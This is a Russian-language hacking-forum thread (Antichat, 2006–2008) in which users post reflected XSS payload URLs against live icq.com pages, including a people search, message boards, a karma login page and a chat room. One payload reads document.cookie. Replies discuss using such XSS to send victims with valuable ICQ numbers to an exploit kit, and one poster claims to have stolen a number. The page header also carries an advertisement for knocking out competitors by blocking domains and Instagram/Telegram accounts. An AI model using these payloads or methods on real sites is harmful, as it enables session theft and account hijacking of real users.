Форум АНТИЧАТ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
XSS icq.com

Опции темы

Поиск в этой теме

Опции просмотра

XSS icq.com

20.10.2006, 00:23

_-[A.M.D]HiM@S-_

Green member

Регистрация: 28.12.2005

Сообщений: 376

Провел на форуме:
5559831

Репутация: 1833

XSS icq.com

Вроде надыбал XSS

PHP код:


		
			
http://people.icq.com/people/?searched=1&keyword2=&my_gender=0&match=0&age_group=&home_country_code=380&m_status=0&donline_only=on&gender=0&age_group=&home_cc=380&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=380&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code=0&past_text=&interest_code=0&interest_text=&group_code=0&group_text=&photo_flag=on&online_only=on&x=4&y=8"><script>alert(/Test%20XSS%20from%20_-[A.M.D]HiM@S-_/)</script>

PHP код:


		
			
http://boards.icq.com/boards/post_msg.php?topic_id=887083&reply_to=3544728&tid=696&sys_id=&return_url=%2Fboards%2Fview_messages.php%3Ftid%3D696%26topic_id%3D887083"><script>alert(/Test XSS/)</script>

PHP код:


		
			
http://www.icq.com/icqchat/chatroom.php?c_id=13browse_folder.php?tid=30279%22;//--%3E%3C/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Последний раз редактировалось _-[A.M.D]HiM@S-_; 21.10.2006 в 00:59..

20.10.2006, 00:34

TreniX

Познающий

Регистрация: 27.05.2006

Сообщений: 30

Провел на форуме:
1141882

Репутация: 135

Отправить сообщение для TreniX с помощью ICQ

Код:

http://people.icq.com/people/?searched=1&keyword2=&my_gender=0&match=0&age_group=&home_country_code=380&m_status=0&donline_only=on&gender=0&age_group=&home_cc=380&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=380&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code=0&past_text=&interest_code=0&interest_text=&group_code=0&group_text=&photo_flag=on"><script>alert()</script>

найти было не трудно! там в лубую переменную вставь скрипт и будет алерт!
P.S а толку от пасивных xss?

Последний раз редактировалось TreniX; 20.10.2006 в 00:37..

26.10.2006, 15:15

Dracula4ever

Постоянный

Регистрация: 08.05.2006

Сообщений: 559

Провел на форуме:
1593567

Репутация: 354

Отправить сообщение для Dracula4ever с помощью ICQ

Отправить сообщение для Dracula4ever с помощью AIM

Отправить сообщение для Dracula4ever с помощью Yahoo

Вот еще 4 который я щас нашел:

PHP код:


		
			
http://www.icq.com/people/?searched="><script>alert(/Dracula4ever/)</script>

PHP код:


		
			
http://www.icq.com/people/?searched=1&keyword2=gf&my_gender=2&match=1&age_group=&home_country_code=972&m_status=0&gender=0&age_group=&home_cc=972&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=972&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company=&past_code="><script>alert(/Dracula4ever/)</script>

PHP код:


		
			
http://www.icq.com/people/?searched=1&keyword2=gf&my_gender=2&match=1&age_group=&home_country_code=972&m_status=0&gender=0&age_group=&home_cc=972&fname=&lname=&nickname=&uin=&home_city=&home_state=&home_cc=972&origin_city=&origin_state=&origin_cc=0&work_oc=0&work_department=&work_company="><script>alert(/Dracula4ever/)</script>

PHP код:


		
			
http://www.icq.com/people/?searched=1&keyword2="><script>alert(/Dracula4ever/)</script>

Последний раз редактировалось dracula4ever; 26.10.2006 в 15:19..

06.03.2008, 13:07

SQL

Познающий

Регистрация: 15.02.2006

Сообщений: 64

Провел на форуме:
242065

Репутация: 100

Отправить сообщение для SQL с помощью ICQ

Код:

https://www.icq.com/karma/login_page.php?icq_number=>"><script>alert('Xss-icq.com')</script>
http://forums.icq.com/forums/index.php?act=view_topic&group_id=523&topic_id=102679&forum_page=1?forum_q=>"><script>alert('Xss-icq.com')</script>
https://www.icq.com/karma/login_page.php?dest=https%3A%2F%2Fwww.icq.com%2Fregister%2Femail_attach.php&sv=20&service=20&css=whitepages?uin_email=>"><script>alert('Xss-icq.com')</script>
http://www.icq.com/people/?gender=0&match=1&age_group=&photo_flag=on&online_only=on&home_cc=41&searched=1&my_gender=2?keyword2=>"><script>alert('Xss-icq.com')</script>

07.03.2008, 16:38

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

Провел на форуме:
1541753

Репутация: 552

ну ещё 1

Код:

https://labs.icq.com/compad/error.html?title=register&err=blocked_country&xtra=%3Cscript%3Ealert('xss')%3C/script%3E

18.06.2008, 13:07

disasembler

Познающий

Регистрация: 24.03.2008

Сообщений: 35

Провел на форуме:
90653

Репутация: 3

Цитата:

P.S а толку от пасивных xss?

толк есть, к примеру впарить амеру с красивым уином редирект на связку:-D
так и я себе угнал нум (только не этой хсс)

18.06.2008, 13:34

Chaak

Познавший АНТИЧАТ

Регистрация: 01.06.2008

Сообщений: 1,047

Провел на форуме:
5321514

Репутация: 3313

Отправить сообщение для Chaak с помощью ICQ

активку лучше бы нашли

18.06.2008, 13:43

heks

Постоянный

Регистрация: 24.08.2007

Сообщений: 474

Провел на форуме:
1484154

Репутация: 126

Отправить сообщение для heks с помощью ICQ

даже если активку найдут то наврят ли тут выложат

18.06.2008, 13:45

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Отправить сообщение для EST a1ien с помощью ICQ

Цитата:

активку лучше бы нашли

Наодили Правдо давно. http://forum.antichat.ru/showthread.php?p=153345#post153345 незнаю может еще живы. )))) хотя ооочень врядли ))

Последний раз редактировалось EST a1ien; 18.06.2008 в 13:50..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
IE XSS Kit	.Slip	Чаты	22	23.10.2006 06:45
XSS worms	Xex	Статьи	0	02.10.2006 01:49
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход